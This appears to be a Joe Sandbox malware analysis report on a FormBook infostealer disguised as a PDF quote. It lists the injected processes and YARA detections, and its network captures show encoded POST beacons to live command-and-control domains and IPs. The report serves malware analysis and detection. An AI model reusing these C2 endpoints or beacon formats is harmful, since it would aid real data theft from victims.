                                                                                                            Data Ascii: YdDTnh=fx8VmIcLsTYm+ByStlFRN3nLjXGPUgzxzn13+NeIgAf6y2A1alLD9eHFrOtiongS2Dt3kd9i0qkkHbht3Qf6E3/H6zf25szRmeyfzcpfoPgF4hhm7FHb+/33nF80VkPw8UFfn93MHs8zGC28TY7K6ZaTq60eUgyq9LR7bcczHv5nX508oalc+tzjh4v2ZeO5Xg==
Dec 12, 2024 21:49:37.743752003 CET | 1236 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 12 Dec 2024 20:49:37 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
ETag: W/"66cce1df-b96"
Content-Encoding: gzip
Dec 12, 2024 21:49:37.743796110 CET | 370 | IN | [gzip-compressed response body omitted]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49997 | 161.97.142.144 | 80 | 5728 | C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:49:39.090007067 CET | 792 | OUT | POST /1a7n/ HTTP/1.1
Host: www.030002350.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.030002350.xyz
Referer: http://www.030002350.xyz/1a7n/
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Content-Length: 223
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                                                                                            Data Ascii: YdDTnh=fx8VmIcLsTYmxBCS+SRRcXnMt3GPeAz1znJ3+MrVg2v6yWw1ZkLDz+HFlutj1Xgn2DhVkcxi0rEkHaRt3DH5Fn/JyTf03MzRmeyfzYJ5oP4F4Rxm6gza9/30ul80DUP08UF9n4v2HvEzGHK8TJ7JxZaZ3q0PcCHVyrwRW60mNMJiS/5m5rELstXQ8/mCUdzwMqpkeQSajTkCoKlX/+99ctA=
Dec 12, 2024 21:49:40.369549990 CET | 1236 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 12 Dec 2024 20:49:40 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
ETag: W/"66cce1df-b96"
Content-Encoding: gzip
Dec 12, 2024 21:49:40.369642973 CET | 370 | IN | [gzip-compressed response body omitted]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 50004 | 161.97.142.144 | 80 | 5728 | C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:49:41.757076025 CET | 10874 | OUT | POST /1a7n/ HTTP/1.1
Host: www.030002350.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.030002350.xyz
Referer: http://www.030002350.xyz/1a7n/
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Content-Length: 10303
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
Data Ascii: YdDTnh=[TRUNCATED]
Dec 12, 2024 21:49:42.990283966 CET | 1236 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 12 Dec 2024 20:49:42 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
ETag: W/"66cce1df-b96"
Content-Encoding: gzip
Dec 12, 2024 21:49:42.990377903 CET | 370 | IN | [gzip-compressed response body omitted]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 50012 | 161.97.142.144 | 80 | 5728 | C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:49:44.407048941 CET | 510 | OUT | GET /1a7n/?-n-l=OFJhRZgx2zhDqHF&YdDTnh=SzU1l/tTxwo1yS+S+GBkbH76tCzhfB/g3n0B8tGNiWfp8ksCFQPrr+3wpvFapjtE3GYokdEi3N4/HopXjg+LHnHi2Aut5Kfel96F5pIIk9Rh6xpkwimlquw= HTTP/1.1
Host: www.030002350.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
Dec 12, 2024 21:49:45.654665947 CET | 1236 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 12 Dec 2024 20:49:45 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2966
Connection: close
Vary: Accept-Encoding
ETag: "66cce1df-b96"
                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
Dec 12, 2024 21:49:45.654725075 CET | 1236 | IN
                                                                                                            Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
Dec 12, 2024 21:49:45.654742956 CET | 698 | IN
                                                                                                            Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 50025 | 66.29.149.46 | 80 | 5728 | C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:49:51.284840107 CET | 775 | OUT | POST /a5zo/ HTTP/1.1
                                                                                                            Host: www.elitevibes.top
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.elitevibes.top
                                                                                                            Referer: http://www.elitevibes.top/a5zo/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 203
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                                                                                            Data Ascii: YdDTnh=L79vHny/YQhsfFlob7u8oUszrhreYGPVap98CT172YjfrVrAUMhWLnRQvRvxN1zFpnVV3Aj+hdzPJ71Ljl4WbXIYuvu4WsL2McFQPWHlZ1NS1yFFucBW1l5rwHpmdXA2CkS6fZfD8NUvCadrsntAO0iWe4WufvxXQ9s32ZUp94EPm3f2lQ4LlH3yiLDYe/zyaQ==
Dec 12, 2024 21:49:52.512181044 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 20:49:52 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 493
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 50026 | 66.29.149.46 | 80 | 5728 | C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:49:53.945494890 CET | 795 | OUT | POST /a5zo/ HTTP/1.1
                                                                                                            Host: www.elitevibes.top
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.elitevibes.top
                                                                                                            Referer: http://www.elitevibes.top/a5zo/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 223
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                                                                                            Data Ascii: YdDTnh=L79vHny/YQhsOV1oeYG8t0s8nBreWmPRapB8CWMm1rHfr0bAVINWMnRQ6hv+OFzMpnpd3Bf+hZbPJ6FLgSsXaHIa7/u+ZML2McFQPWSyZxhS1C1Fu9BRpV5qn3pmW3BxCkTtfb758P8vCf5rt2tHE0iQBoX9afoge/h6z6gYzpcVnxSs0hZc3HTB/MKsT8O7BQJ20GyWhadc3uqnaQgzZAc=
Dec 12, 2024 21:49:55.205210924 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 20:49:54 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 493
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 50027 | 66.29.149.46 | 80 | 5728 | C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:49:56.600903034 CET | 10877 | OUT | POST /a5zo/ HTTP/1.1
                                                                                                            Host: www.elitevibes.top
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.elitevibes.top
                                                                                                            Referer: http://www.elitevibes.top/a5zo/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 10303
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
Data Ascii: YdDTnh= [TRUNCATED]
Dec 12, 2024 21:49:57.911501884 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 20:49:57 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 493
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 50028 | 66.29.149.46 | 80 | 5728 | C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:49:59.267200947 CET | 511 | OUT | GET /a5zo/?YdDTnh=G5VPERT9FhRGJhNIRpmoyXcxrAHSeRDYD481MD187sPPhEeAXpBmYE5VzzyVUlrKlAIY3hSLkfzvU4FcgkoVbU14woS6WrnDZ9EPDWXrZ28nzgl0lvFto1M=&-n-l=OFJhRZgx2zhDqHF HTTP/1.1
                                                                                                            Host: www.elitevibes.top
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
Dec 12, 2024 21:50:00.512592077 CET | 652 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 20:50:00 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 493
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                                            Target ID:0
                                                                                                            Start time:15:46:53
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:861'696 bytes
                                                                                                            MD5 hash:3979572152F3FB2B98211EEB761309AF
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:5
                                                                                                            Start time:15:47:29
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                            Imagebase:0x7ff799140000
                                                                                                            File size:262'432 bytes
                                                                                                            MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2352816417.0000000000FD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2354528034.0000000002830000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:6
                                                                                                            Start time:15:47:51
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe"
                                                                                                            Imagebase:0xb80000
                                                                                                            File size:140'800 bytes
                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3561019858.00000000039F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            Target ID:7
                                                                                                            Start time:15:47:53
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\regini.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\SysWOW64\regini.exe"
                                                                                                            Imagebase:0x670000
                                                                                                            File size:41'472 bytes
                                                                                                            MD5 hash:C99C3BB423097FCF4990539FC1ED60E3
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3560935486.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3560872245.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:moderate
                                                                                                            Has exited:false

                                                                                                            Target ID:8
                                                                                                            Start time:15:48:06
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe"
                                                                                                            Imagebase:0xb80000
                                                                                                            File size:140'800 bytes
                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3560408446.0000000001230000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            Target ID:10
                                                                                                            Start time:15:48:18
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                            Imagebase:0x7ff6bf500000
                                                                                                            File size:676'768 bytes
                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true


                                                                                                              Execution Graph

                                                                                                              Execution Coverage:11.8%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:5.7%
                                                                                                              Total number of Nodes:158
                                                                                                              Total number of Limit Nodes:8

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ry$ry$ry
                                                                                                              • API String ID: 0-128149707
                                                                                                              • Opcode ID: f6da0587aaaf4634b5c81e463d34960c2288251b17cd87f57fec849a50ffb019
                                                                                                              • Instruction ID: 8e482067a94882382827f4435d886de1c9562aee8b9ecde922f37ea4b09aa4cd
                                                                                                              • Opcode Fuzzy Hash: f6da0587aaaf4634b5c81e463d34960c2288251b17cd87f57fec849a50ffb019
                                                                                                              • Instruction Fuzzy Hash: 52D18DB5E1520ADFDB18DFA5C4814AEFBB6FF89300F10C456E416AB218D734AA42CF94

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ry$ry$ry
                                                                                                              • API String ID: 0-128149707
                                                                                                              • Opcode ID: f737f2ff24e44617c5d18d46a679320d498e1d1edec3a622a34d834ce155fe6b
                                                                                                              • Instruction ID: 0152c41497f2d620e8df82f97b858304aecd566b3ffacdb534f11627b22bba69
                                                                                                              • Opcode Fuzzy Hash: f737f2ff24e44617c5d18d46a679320d498e1d1edec3a622a34d834ce155fe6b
                                                                                                              • Instruction Fuzzy Hash: FFD17CB5E1420ADFDB18DFA5C4854AEFBB6FF89300F10D456E416AB218D734AA42CF94

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ry$ry$ry
                                                                                                              • API String ID: 0-128149707
                                                                                                              • Opcode ID: 5f8826648f9be1c6843b5689ab7c0615db88e93cdf08a30fd3c856af63866923
                                                                                                              • Instruction ID: 0f041df7d8b28333469eb9c4ee4f87eff3771564a8210be6c7eed72880096212
                                                                                                              • Opcode Fuzzy Hash: 5f8826648f9be1c6843b5689ab7c0615db88e93cdf08a30fd3c856af63866923
                                                                                                              • Instruction Fuzzy Hash: 4AC18CB5E1420ADFDB18DF95C4858AEFBB6FF89300F10D455E416AB218D734AA82CF94

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Te^q$Te^q$z^I
                                                                                                              • API String ID: 0-2886491258
                                                                                                              • Opcode ID: ddbd5d880086f0b00bf0dca097b7d31af856f8d7549b38ee8c71469b9a21a1cd
                                                                                                              • Instruction ID: 9a2e111dcc89cffd094e6a81307fa85e1942bc40c4f084bf5e05b3bbb87f0016
                                                                                                              • Opcode Fuzzy Hash: ddbd5d880086f0b00bf0dca097b7d31af856f8d7549b38ee8c71469b9a21a1cd
                                                                                                              • Instruction Fuzzy Hash: A2A115B5E102098FDB08CFA9C5846DDFBB6FF89310F24942AD419AB364D7349986CF54

                                                                                                              Control-flow Graph

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Te^q$Te^q$z^I
                                                                                                              • API String ID: 0-2886491258

                                                                                                              Control-flow Graph

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Te^q$Te^q$z^I
                                                                                                              • API String ID: 0-2886491258

                                                                                                              Control-flow Graph

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: TuA$UC;"
                                                                                                              • API String ID: 0-2071649361

                                                                                                              Control-flow Graph

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: TuA$UC;"
                                                                                                              • API String ID: 0-2071649361
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 5=6
                                                                                                              • API String ID: 0-2897083178
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 5=6
                                                                                                              • API String ID: 0-2897083178
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2080722045.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4d40000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2080722045.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4d40000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2080722045.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4d40000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Memory Dump Source
